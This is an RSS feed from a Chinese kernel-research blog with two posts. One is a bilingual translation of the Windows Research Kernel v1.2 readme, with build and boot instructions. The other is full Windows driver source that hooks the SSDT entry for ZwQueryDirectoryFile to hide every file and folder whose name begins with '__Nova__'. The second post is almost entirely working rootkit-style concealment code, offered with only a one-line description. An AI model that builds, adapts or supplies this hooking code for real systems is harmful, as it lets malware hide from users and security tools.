内核研究 - 星空博客 http://www.xklog.org/rss.php?cate=8 对操作系统的内核研究 zh-cn Powered By XKLog V0.7.244.Copyright 2010 星空博客 All Rights Reserved. Thu, 09 Sep 2010 11:04:27 +0000 XKLog V0.7.244 <![CDATA[亲自翻译 Windows Research Kernel v1.2 readme.txt]]> http://www.xklog.org/article/kernel/the-translation-of-Windows-Research-Kernel-v1-2-readme-txt.html 星空泪 Copyright (c) Microsoft Corporation. All rights reserved.
这句就不用翻译了吧……

You may only use this code if you agree to the terms of
the Windows Research Kernel Source Code License agreement
(see License.txt).  If you do not agree to the terms, do not use the code.

你只有同意 Windows 研究内核源代码协议(见License.txt) 才能使用这些代码。
如果你不同意,请不要使用这些代码。

***

WRK v1.2

The Windows Research Kernel v1.2 contains the sources for the core of
the Windows (NTOS) kernel and a build environment for a kernel that will run on
    x86     (Windows Server 2003 Service Pack 1) and
    AMD64   (Windows XP x64 Professional)
A future version may also support booting WRK kernels on Windows XP x86 systems,
but the current kernels will fail to boot due to differences in some shared structures.

Windows 研究内核 v1.2 包含了Windows 的内核代码以及一个编译内核的环境,这个内核能够在x86  (Windows Server 2003 Service Pack 1)  和 AMD64   (Windows XP x64 Professional) 上运行。一个未来的版本可能会支持在 Windows XP x86 系统上启动内核。但是目前的版本不行,因为在一些共享的结构上存在差异。

The NTOS kernel implements the basic OS functions
for processes, threads, virtual memory and cache managers, I/O management,
the registry, executive functions such as the kernel heap and synchronization,
the object manager, the local procedure call mechanism, the security reference
monitor, low-level CPU management (thread scheduling, Asynchronous and Deferred
Procedure calls, interrupt/trap handling, exceptions), etc.

这个 NTOS 内核实现了一些基础的操作系统函数,包括进程、线程、虚拟内存、高速缓存管理器、输入输出管理,内核堆和同步的注册、执行函数、对象管理器、本地过程调用机制、安全参考监视器、低水平的 CPU 管理(线程调度,异步以及延迟过程调用,中断/陷阱处理,异常处理),等等

The NT Hardware Abstraction Layer, file systems, network stacks, and device
drivers are implemented separately from NTOS and loaded into kernel mode
as dynamic libraries.  Sources for these dynamic components are not included
in the WRK, but some are available in various development kits published
by Microsoft, such as the Installable File System (IFS) Kit and the
Windows Driver Development Kit (DDK).

NT 硬件抽象层,文件系统,网络堆栈。设备驱动程序被从 NTOS 中分离了出来,以动态链接库的方式运行在内核模式。这些动态组件的源代码并没有被包含在 WRK 中,但是其中的某一些可以在微软发布的各种开发包中找到,例如设备文件系统开发包和 Windows 驱动开发套件。

WRK v1.2 includes most of the NTOS kernel sources from the latest released
version of Windows, which supports the AMD64 architecture on the Desktop.
The kernel sources excluded from the kit are primarily in the areas of
plug-and-play, power management, the device verifier, kernel debugger
interface, and virtual dos machine.  The primary modifications to WRK
from the released kernel are related to cleanup and removal of server
support, such as code related to the Intel IA64.

WRK v1.2 包含了 NTOS 内核的大部分源代码,这些代码来自最新发布版的 Windows。它支持 AMD64 结构的桌面。内核代码中不包含的代码主要在即插即用、电源管理、设备校验、内核调试接口以及 DOS 虚拟机。从发布版内核到 WRK 主要的修改与清除和移去服务(器?)支持有关,例如与 Intel IA64 有关的代码。

***

Organization of the WRK sources

WRK 源代码的组织

The file License.txt contains the license covering use of the WRK.

License.txt 文件包含了使用 WRK 所需要遵循的协议。

The public\ directory contains a number of include files shared among system
components.  base\ntos\ contains the NTOS sources.

public\ 目录包含了系统组件共享的一些包含文件。base\ntos\ 目录下包含了 NTOS 的源代码。

The primary NTOS source components included in the WRK are organized as follows:

WRK 中主要的 NTOS 源代码按如下方式组织:

    cache\  - cache manager
    config\ - registry implementation
    dbgk\   - user-mode debugger support
    ex\     - executive functions (kernel heap, synchronization, time)
    fsrtl\  - file system run-time support
    io\     - I/O manager
    ke\     - scheduler, CPU management, low-level synchronization
    lpc\    - local procedure call implementation
    mm\     - virtual memory manager
    ob\     - kernel object manager
    ps\     - process/thread support
    se\     - security functions
    wmi\    - Windows Management Instrumentation

    inc\    - NTOS-only include files
    rtl\    - kernel run-time support
    init\   - kernel startup

   cache\  - 高速缓存管理器
    config\ - 注册实现
    dbgk\   -用户模式调试器支持
    ex\     - 执行功能 (内核堆, 同步, 时间)
    fsrtl\  - 运行时文件系统支持
    io\     - 输入输出管理器
    ke\     - 调度程序, CPU 管理, 低水平的同步
    lpc\    - 本地过程调用实现
    mm\     - 虚拟内存管理器
    ob\     - 内核对象管理器
    ps\     - 进程/线程支持
    se\     - 安全功能体
    wmi\    - Windows 管理装置

    inc\    - NTOS 包含文件
    rtl\    - 运行时内核支持
    init\   - 内核启动

***

Two of the best existing sources for documentation of the NTOS kernel are

现有的两个关于 NTOS 内核最好的文档是:

    Microsoft Windows Internals, 4th Ed 2005, Mark Russinovich and David Solomon

    The Windows Curriculum Resource Kit (CRK)
    http://www.msdnaa.net/curriculum/pfv.aspx?ID=6191

Additional information about using Windows for teaching and research
in operating systems is available at

使用 Windows 进行教学和研究操作系统的更多信息可以访问以下网址:

    http://www.microsoft.com/resourc ... indowsAcademic.mspx

Specific questions about use of the WRK, CRK, or ProjectOZ can be directed to

关于使用 WRK, CRK, 或者 ProjectOZ 特殊问题可以发邮件到:

    compsci@microsoft.com

Questions about the kernel sources (or CRK or ProjectOZ) can be directed to
the MSDN academic forum groups (http://forums.microsoft.com/WindowsAcademic)

关于内核代码(或者 CRK 或者 ProjectOZ)的任何疑问可以前往 MSDN academic forum groups (http://forums.microsoft.com/WindowsAcademic)


    Curriculum
        A discussion forum regarding development of operating systems curriculum
        based on the Windows kernel, including use of the Windows Curriculum
        Resource Kit, the Windows Research Kernel, and ProjectOZ.

    课程
        一个基于 Windows 内核开发操作系统的讨论论坛
        包括 Windows 课程资源包的使用, WRK 和 ProjectOZ.

    Kernel
        Questions & Answers regarding the Windows Research Kernel,
        its architecture, source code and use in teaching and research.

    内核
        关于 WRK 的问答,它的结构,源代码在教学研究中的使用

    ProjectOZ
        Questions & Answers regarding use of ProjectOZ for teaching and
        research of operating systems topics.

    ProjectOZ
        使用 ProjectOZ 进行操作系统主题的教学研究的问答

***

Building/deploying a WRK kernel for x86 [or amd64]

为 x86 [或者 amd64] 建立/配置一个 WRK 内核:

    0. Copy the WRK into a directory, say %wrk%.  
    1. set arch=x86 [or amd64]
    2. path %wrk%\tools\%arch%;%path%
    3. cd %wrk%\base\ntos
    4. nmake -nologo %arch%=
        will produce kernel files in BUILD\EXE\%arch%
        [wrkx86.* or wrkx64.*]
    5. copy the kernel to %SystemRoot%\system32\
    6. if x86, find the Multi-processor version of hal.dll [see below]
    7. add a line to C:\boot.ini of the target system
        to boot this kernel and the MP hal [see below]
    8. reboot and select the boot option for the new kernel
    9. you will boot up on a kernel you built/linked yourself!
        [always keep the original boot.ini line and kernel/hal available so you
         can still boot your system if something fails with your WRK kernel modifications]
    10. set up a debugger [see below]

    0. 把 WRK 复制到一个目录中, 称之为 %wrk%.  
    1. 设置 arch=x86 [或 amd64]
    2. path %wrk%\tools\%arch%;%path%
    3. cd %wrk%\base\ntos
    4. nmake -nologo %arch%=
        将会把内核文件产生到 BUILD\EXE\%arch% 中
        [wrkx86.* 或 wrkx64.*]
    5. 把内核复制到 %SystemRoot%\system32\
    6. 如果是 x86, 找到 hal.dll 的多处理器版本[见下面]
    7. 在 C:\boot.ini 为目标系统中添加一行
        以便引导内核和 MP 硬件抽象层 [见下面]
    8. 重启并选择新内核的启动选项
    9. 你将会以你自己建立/连接的内核启动!
        [总是保持原有的 boot.ini 和 kernel/hal 可用,这样当 WRK 启动失败的时候你仍然可以启动你的系统]
    10. 启动一个调试器[见下面]

Multi-processor hal (x86 only, amd64 hals are all MP)
    All hals are renamed hal.dll, so you have to use the link command to
    see what type of hal hal.dll really is:
        link -dump -all hal.dll | findstr pdb
    The MP hals have an 'm' in the native name of the hal, e.g. halmacpi.dll
    You may already have an MP hal installed on UP systems, due to hyperthreading.
    If the hal isn't MP, you need to find the MP hal that corresponds to the current hal
    the target system does have, i.e.
        halacpi.dll  -> halacpim.dll    ; ACPI PIC-based PC  [used by VirtualPC]
        halaacpi.dll -> halmacpi.dll    ; ACPI APIC-based PC
        halapic.dll  -> halmps.dll      ; MPS
    Look in the WRK WS03SP1HALS\x86 directory for the MP hal you need.

多处理器硬件抽象层 (只针对 x86 , amd64 hals 都是 MP 的)
    所有的硬件抽象层都被重命名为 hal.dll, 所以你必须使用连接命令究竟是何种 hal.dll :
        link -dump -all hal.dll | findstr pdb
    多处理器硬件抽象层在本地硬件抽象层的名称中有一个字母 'm' , 例如 halmacpi.dll
    由于超线程,你可能已经在一个 UP 系统上安装了一个 MP 硬件抽象层。
    如果硬件抽象层不是 MP, 你需要找到与目标系统当前拥有的 hal 相对应的 MP hal
    也就是:
        halacpi.dll  -> halacpim.dll    ; ACPI PIC-based PC  [used by VirtualPC]
        halaacpi.dll -> halmacpi.dll    ; ACPI APIC-based PC
        halapic.dll  -> halmps.dll      ; MPS
    在 WRK WS03SP1HALS\x86 目录中寻找你所需要的 MP hal.

Boot.ini
    Edit boot.ini (you may have to use attrib -h -s -r first)
    Copy the line for the first operating system listed to the end of the file and edit it.
        [boot loader]
        timeout=30
        default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS
        [operating systems]
        multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Windows Server 2003, Standard"
        multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="test" /kernel=wrkx86.exe /hal=halmacpi.dll
    Note that the filenames must be short (8.3) names.
    You can add additional options for debugging (as specified in the WinDbg/KD help).

Boot.ini
   编辑 boot.ini (你可能需要先使用 attrib -h -s -r)
    把列出来的第一个操作系统的那一行复制到文件尾部并编辑它.
        [boot loader]
        timeout=30
        default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS
        [operating systems]
        multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Windows Server 2003, Standard"
        multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="test" /kernel=wrkx86.exe /hal=halmacpi.dll
    注意文件名必须是短文件名.
    你可以为调试器添加一个额外的项 (按照 WinDbg/KD 帮助手册中的说明).

Debugging WRK
    The WinDBG/KD debuggers will work with the WRK.  The documentation is pretty thorough, and
    includes information about how to debug across a serial port, locally (examining kernel
    data from user-mode), and debugging kernels running on VirtualPC.

    Version 6.6.3.5 of the WinDBG/KD debuggers is available with the Curriculum Resource Kit
    Tools ("CurriculumResourceKit-CRK\CRKTools\Debugging Tools" directory on the CD).  
    The latest version of the Windows Debugging Tools can be downloaded from
    http://www.microsoft.com/whdc/devtools/debugging.

调试 WRK
    WinDBG/KD 调试器能够与 WRK 一起工作.  文档非常完整, 并且包含了如何通过一个串口行调试的信息,
     局部的 (从用户模式检查内核数据), 并调试在 VirtualPC 上运行的内核.

    6.6.3.5 版本的 WinDBG/KD 调试器已经在课程资源包中提供了。
   工具(CD 中的"CurriculumResourceKit-CRK\CRKTools\Debugging Tools" 目录).  
    Windows 调试工具的最新版本可以在http://www.microsoft.com/whdc/devtools/debugging.下载

]]> 内核研究 http://www.xklog.org/article/kernel/the-translation-of-Windows-Research-Kernel-v1-2-readme-txt.html Sun, 06 Dec 2009 00:25:19 +0000 <![CDATA[一个隐藏文件的驱动程序源代码]]> http://www.xklog.org/article/kernel/source-code-of-a-hide-file-device-driver.html 星空泪  这个驱动被加载后能够自动隐藏所有以“__Nova__”开头的文件和文件夹。

Hidefile.h 文件

C++代码
  1. #include "ntddk.h"   
  2. #include <windef.h>   
  3.   
  4. #pragma pack(1) //SSDT Table   
  5. typedef struct ServiceDescriptorEntry {   
  6.     unsigned int *ServiceTableBase;   
  7.     unsigned int *ServiceCounterTableBase; //仅适用于checked build版本   
  8.     unsigned int NumberOfServices;   
  9.     unsigned char *ParamTableBase;   
  10. } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;   
  11. #pragma pack()   
  12.   
  13. __declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;   
  14.   
  15. //获得SSDT基址宏   
  16. #define SYSTEMSERVICE(_function)  KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]   
  17.   
  18. NTSTATUS DriverEntry(IN PDRIVER_OBJECT  DriverObject,IN PUNICODE_STRING  RegistryPath);   
  19. VOID Unload(IN PDRIVER_OBJECT  DriverObject);   
  20.   
  21. //取代的新函数   
  22. NTSTATUS NTAPI NewZwQueryDirectoryFile(   
  23.   IN HANDLE               FileHandle,   
  24.   IN HANDLE               Event OPTIONAL,   
  25.   IN PIO_APC_ROUTINE      ApcRoutine OPTIONAL,   
  26.   IN PVOID                ApcContext OPTIONAL,   
  27.   OUT PIO_STATUS_BLOCK    IoStatusBlock,   
  28.   OUT PVOID               FileInformation,   
  29.   IN ULONG                Length,   
  30.   IN FILE_INFORMATION_CLASS FileInformationClass,   
  31.   IN BOOLEAN              ReturnSingleEntry,   
  32.   IN PUNICODE_STRING      FileMask OPTIONAL,   
  33.   IN BOOLEAN              RestartScan );   
  34.   
  35. //API 声明   
  36. NTSYSAPI NTSTATUS NTAPI ZwQueryDirectoryFile(   
  37.   IN HANDLE               FileHandle,   
  38.   IN HANDLE               Event OPTIONAL,   
  39.   IN PIO_APC_ROUTINE      ApcRoutine OPTIONAL,   
  40.   IN PVOID                ApcContext OPTIONAL,   
  41.   OUT PIO_STATUS_BLOCK    IoStatusBlock,   
  42.   OUT PVOID               FileInformation,   
  43.   IN ULONG                Length,   
  44.   IN FILE_INFORMATION_CLASS FileInformationClass,   
  45.   IN BOOLEAN              ReturnSingleEntry,   
  46.   IN PUNICODE_STRING      FileMask OPTIONAL,   
  47.   IN BOOLEAN              RestartScan );   
  48.   
  49. typedef NTSTATUS (*ZWQUERYDIRECTORYFILE)(   
  50.   IN HANDLE               FileHandle,   
  51.   IN HANDLE               Event OPTIONAL,   
  52.   IN PIO_APC_ROUTINE      ApcRoutine OPTIONAL,   
  53.   IN PVOID                ApcContext OPTIONAL,   
  54.   OUT PIO_STATUS_BLOCK    IoStatusBlock,   
  55.   OUT PVOID               FileInformation,   
  56.   IN ULONG                Length,   
  57.   IN FILE_INFORMATION_CLASS FileInformationClass,   
  58.   IN BOOLEAN              ReturnSingleEntry,   
  59.   IN PUNICODE_STRING      FileMask OPTIONAL,   
  60.   IN BOOLEAN              RestartScan );   
  61.   
  62. typedef struct _FILE_BOTH_DIR_INFORMATION {   
  63.     ULONG NextEntryOffset;   
  64.     ULONG FileIndex;   
  65.     LARGE_INTEGER CreationTime;   
  66.     LARGE_INTEGER LastAccessTime;   
  67.     LARGE_INTEGER LastWriteTime;   
  68.     LARGE_INTEGER ChangeTime;   
  69.     LARGE_INTEGER EndOfFile;   
  70.     LARGE_INTEGER AllocationSize;   
  71.     ULONG FileAttributes;   
  72.     ULONG FileNameLength;   
  73.     ULONG EaSize;   
  74.     CCHAR ShortNameLength;   
  75.     WCHAR ShortName[12];   
  76.     WCHAR FileName[1];   
  77. } FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;   
  78.   
  79. //源地址   
  80. ZWQUERYDIRECTORYFILE OldZwQueryDirectoryFile = NULL;  

Hidefile.c 文件

 

C++代码
  1. #include "Hidefile.h"   
  2.   
  3. NTSTATUS DriverEntry(IN PDRIVER_OBJECT  DriverObject,IN PUNICODE_STRING  RegistryPath)   
  4. {   
  5.     NTSTATUS ntStatus = STATUS_SUCCESS;   
  6.   
  7.     DriverObject->DriverUnload = Unload;   
  8.   
  9.     KdPrint(("Driver Entry Called!\n"));   
  10.   
  11.     KdPrint(("OldAddress:0x%X\tNewAddress:0x%X\n",SYSTEMSERVICE(ZwQueryDirectoryFile),NewZwQueryDirectoryFile));   
  12.     OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)SYSTEMSERVICE(ZwQueryDirectoryFile);   
  13.     (ZWQUERYDIRECTORYFILE)SYSTEMSERVICE(ZwQueryDirectoryFile) = NewZwQueryDirectoryFile;   
  14.   
  15.     return ntStatus;   
  16. }   
  17.   
  18. VOID Unload(IN PDRIVER_OBJECT  DriverObject)   
  19. {   
  20.     KdPrint(("Driver Unload Called!\n"));   
  21.     (ZWQUERYDIRECTORYFILE)SYSTEMSERVICE(ZwQueryDirectoryFile) = OldZwQueryDirectoryFile;   
  22.     KdPrint(("Address:0x%X\n",SYSTEMSERVICE(ZwQueryDirectoryFile)));   
  23.     return;   
  24. }   
  25.   
  26. NTSTATUS NTAPI NewZwQueryDirectoryFile(   
  27.   IN HANDLE               FileHandle,   
  28.   IN HANDLE               Event OPTIONAL,   
  29.   IN PIO_APC_ROUTINE      ApcRoutine OPTIONAL,   
  30.   IN PVOID                ApcContext OPTIONAL,   
  31.   OUT PIO_STATUS_BLOCK    IoStatusBlock,   
  32.   OUT PVOID               FileInformation,   
  33.   IN ULONG                Length,   
  34.   IN FILE_INFORMATION_CLASS FileInformationClass,   
  35.   IN BOOLEAN              ReturnSingleEntry,   
  36.   IN PUNICODE_STRING      FileMask OPTIONAL,   
  37.   IN BOOLEAN              RestartScan )   
  38. {   
  39.     NTSTATUS ntStatus = OldZwQueryDirectoryFile(   
  40.         FileHandle,   
  41.         Event,   
  42.         ApcRoutine,   
  43.         ApcContext,   
  44.         IoStatusBlock,   
  45.         FileInformation,   
  46.         Length,   
  47.         FileInformationClass,   
  48.         ReturnSingleEntry,   
  49.         FileMask,   
  50.         RestartScan);   
  51.   
  52.     if(NT_SUCCESS(ntStatus) && (FileInformationClass == FileBothDirectoryInformation))   
  53.     {   
  54.         PVOID p = FileInformation;   
  55.         PVOID pLast = NULL;   
  56.         DWORD pLastOne = 0;   
  57.         //KdPrint(("<--------\n"));   
  58.         do{   
  59.             pLastOne = ((PFILE_BOTH_DIR_INFORMATION)p)->NextEntryOffset;   
  60.             //KdPrint(("[*]Last:0x%x\tCurrent:0x%x\tpLastOne:%ld\n",pLast,p,pLastOne));   
  61.                
  62.             if(RtlCompareMemory((PVOID)&((PFILE_BOTH_DIR_INFORMATION)p)->FileName[0], L"__Nova__", 16 ) == 16 )   
  63.             {   
  64.                 KdPrint(("[-]Hide.....\n"));   
  65.                 if(pLastOne == 0)   
  66.                 {   
  67.                     if (p == FileInformation)   
  68.                         ntStatus = STATUS_NO_MORE_FILES;   
  69.                     else  
  70.                         ((PFILE_BOTH_DIR_INFORMATION)p)->NextEntryOffset = 0;   
  71.                     break;   
  72.                 }   
  73.                 else  
  74.                 {   
  75.                     int iPos = ((ULONG)p) - (ULONG)FileInformation;   
  76.                     int iLeft = (DWORD)Length - iPos - pLastOne;   
  77.                     RtlCopyMemory(p,(PVOID)((char*)p + pLastOne),(DWORD)iLeft);   
  78.                     KdPrint(("iPos:%ld\tLength:%ld\tiLeft:%ld\t,NextOffset:%ld\tpLastOne:%ld\tCurrent:0x%x\n",iPos,Length,iLeft,((PFILE_BOTH_DIR_INFORMATION)p)->NextEntryOffset,pLastOne,p));   
  79.                     continue;   
  80.                 }   
  81.             }   
  82.             pLast = p;   
  83.             p = ((char*)p + ((PFILE_BOTH_DIR_INFORMATION)p)->NextEntryOffset);   
  84.         }while (pLastOne != 0);   
  85.         //KdPrint(("-------->\n"));   
  86.     }   
  87.   
  88.     return ntStatus;   
  89. }  
]]> 内核研究 http://www.xklog.org/article/kernel/source-code-of-a-hide-file-device-driver.html Mon, 19 Oct 2009 09:35:40 +0000